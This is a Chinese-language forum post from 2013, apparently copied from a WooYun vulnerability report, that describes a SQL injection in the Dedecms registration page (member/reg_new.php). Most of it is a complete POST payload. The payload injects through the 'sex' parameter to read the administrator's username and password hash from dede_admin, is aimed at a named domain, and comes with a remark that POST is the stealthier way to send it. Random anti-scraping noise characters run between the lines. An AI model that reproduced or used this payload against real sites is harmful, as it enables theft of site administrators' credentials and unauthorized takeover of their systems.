中国网络渗透测试联盟
标题:
织梦SQL注入漏洞再利用
[打印本页]
作者:
admin
时间:
2013-1-19 08:25
标题:
织梦SQL注入漏洞再利用
漏洞类型: SQL注射漏洞
4 }# K* E! H$ ~+ }3 _
简要描述:
& V6 A! w: f" P5 N2 w1 v# G+ Y! r% v
: @" T/ h0 o [( e6 r/ I- j1 ~8 ^
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
& S8 t) T$ P g7 ]# X! Z
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
4 v$ Q: w% | l! n8 F& m
详细说明:跟这个漏洞
0 R) g! L9 e( ^/ ~
% @; E2 F) [4 Q/ p
WooYun: Dedecms SQL注射导致审核机制绕过漏洞
& r! S+ v! C8 [) q2 w0 {
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
3 E7 f- V% G3 A; l7 r
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
2 h9 d$ N) m" [6 M. @
! h, F# E3 ^* I3 B& c
www.political-security.com/member/reg_new.php
4 O+ s( {: _* h v; J
$ a- K# u2 o' W5 F
POST
% o4 T# C+ O6 L7 Z8 p) |
# I8 I$ r& g) v/ y( W% f
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
+ ]8 J- G* P) h$ j
userid=c4rp3nt3r&uname=c4rp3nt3r
/ j' d. r' ^6 b% {3 U$ _3 G% ^
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
, U. w0 v: |7 K& r) x
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
- F! @5 U c/ {) V7 ]6 S) g
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
1 L- K) N; b: |) R: i
%00&vdcode=glos&agree=
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2